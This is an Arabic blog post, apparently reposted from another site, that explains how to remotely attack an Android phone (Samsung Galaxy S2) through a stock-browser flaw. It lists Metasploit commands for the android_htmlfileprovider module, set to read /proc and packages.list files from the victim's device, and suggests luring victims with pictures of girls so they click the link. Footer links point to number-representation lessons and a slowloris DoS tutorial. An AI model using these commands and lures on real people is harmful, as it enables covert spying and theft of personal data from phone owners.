اختراق هواتف الأندرويد عن بعد والتجسس عليها

-

الثغرات هي شيء لا يمكن الاستغناء عنه في عالم الأنترنيت, والانترنيت كدالك اصبح عادتنا اليومية . يعني كلما جلست أمام الحاسوب فتوقع أشياء لم تتوقعها.
وكما نعلم فالهواتف التي تستعمل نظام الأندرويد هي في انتشار قوي وتكسب زبائن من كل دول العالم ودالك لمرونتها وسهولة استعمالها.



في هدا الفيديو سوف نسلط الضوء على أحد طرق التي قد يستعملها الهاكر الغير أخلاقي لاختراق الهواتف الدكية , والتي قد يستعين فيها ببعض الهندسة الاجتماعية والتي سيجمع فيها بعض المعلومات عن الضحية ثم سيباشر الهجوم باستعمال أحد الثغرات الموجودة بالجهاز.

في هدا الموضوع نؤخدكم في عرض لعملية الاختراق مباشرة وسنستعمل فيها هاتف Samsung Galaxy s2 ونستغل فيها ثغرة المتصفح الدي يأتي بشكل افتراضي مع الجهاز .

الثغرة تكمن في ان المتصفح يقوم باستقبال وتحميل البرنامج الضار دون أن يعطي اي اندار للمستخدم ان هناك ملف تم تحميله,  وهدا ما قد يكون السبب في عدم ملاحظة المستخدم للملف الضار ومن ثم لن يشعر بشيء الى أن تقع الكارثة ويتم سرقة كل معلوماته .

الأوامر التي  ثم استعمالها في الفيديو هي :

use auxiliary/gather/android_htmlfileprovider

set SRVHOST  الأيبي الخاص بك

set SRVPORT  80

set URIPATH  /

set FILES  /proc/version,/proc/self/status,/data/system/packages.list


الهاكر سيحاول تمويه الضحية بأي شكل من الأشكال , يعني فقد يرسل صور فتيات أو شيء المهم هو يجعلك تضغط على الوصلة بدون أن تشعر بأي شيء .

والفيديو أسفله سيشرح لكم الطريقة بشكل بسيط وسلس .ونأخد فيه الأساسيات ودالك لحساسية الموضوع, وأي سؤال المرجو طرحه تحت الفيديو وسوف أجيب عليه في أقرب وقت .

 


       


      تم نقل الموضوع من مدونة Demosec


    المشاركات الشائعة من هذه المدونة

    تمثيل الأعداد السالبة بطريقة الإشارة والقيمة المطلقة - Signed Magnitude Representation

    -
    صورة
    أول طريقة سنتعرف عليها لتمثيل  الأعداد السالبة في النظام الثنائي  تسمى  Signed Magnitude Representation . هذه الطريقة تعتمد على تمثيل إشارة العدد وقيمته المطلقة، لهذا فضلت ترجمتها بطريقة الإشارة والقيمة المطلقة.  هذا الدرس يشمل: تحويل عدد سالب من النظام العشري إلى النظام الثنائي بطريقة Signed Magnitude Representation تحويل عدد سالب من النظام الثنائي إلى النظام العشري بطريقة Signed Magnitude Representation تحويل عدد سالب بعدد بتات مختلف عيوب طريقة Signed Magnitude Representation المصدر
    قراءة المزيد

    تمثيل الأعداد السالبة: المتمم الثنائي - Two's Complement من العشري إلى الثنائي

    -
    صورة
    بعدما تعرفنا على طريقة  Signed Magnitude Representation    وطريقة  المتمم الأحادي  لتمثيل الأعداد السالبة وتعرفنا على المشاكل التي   بهما، سنتعرف في هذا الدرس على الطريقة الأكثر استعمالا لتمثيل الأعداد السالبة. هذه الطريقة تسمى  المتمم الثنائي - Two's Complement . في الدرس شرح للخطوات المتبعة لتحويل الأعداد السالبة والموجبة بهذه الطريقة من  النظام العشري إلى النظام الثنائي  وفي الأسفل ستجدون تمارين محلولة، يمكنكم الاستعانة بها للتدرب. في الدرس المقبل سنقدم طريقة تحويل الأعداد بإشارة من النظام الثنائي للنظام العشري بهذه الطريقة. هذا الدرس يشمل: تحويل عدد سالب من النظام العشري إلى النظام الثنائي بطريقة المتمم الثنائي تقنية لتحويل عدد سالب من النظام العشري إلى النظام الثنائي بطريقة المتمم الثنائي بسرعة تحويل عدد سالب بعدد بتات مختلف المصدر
    قراءة المزيد

    كالي لينكس: طريقه عمل هجمات Dos Attack على نظام كالي لينكس

    -
    صورة
    كالي لينكس: طريقه عمل هجمات Dos Attack على نظام كالي لينكس   اليوم في درسنا هذا سنتحدث عن طريقه عمل هجمات الدوس اتاك Dos Attack اي هجمات حجب الخدمه المشهوره ( denial of service ) .   رابط اداه slowloris المستخدم في الشرح   اضغط هنا لتحميل الاداه   و الان ساتركم مع الشرح التفصيلي بالفيديو 
    قراءة المزيد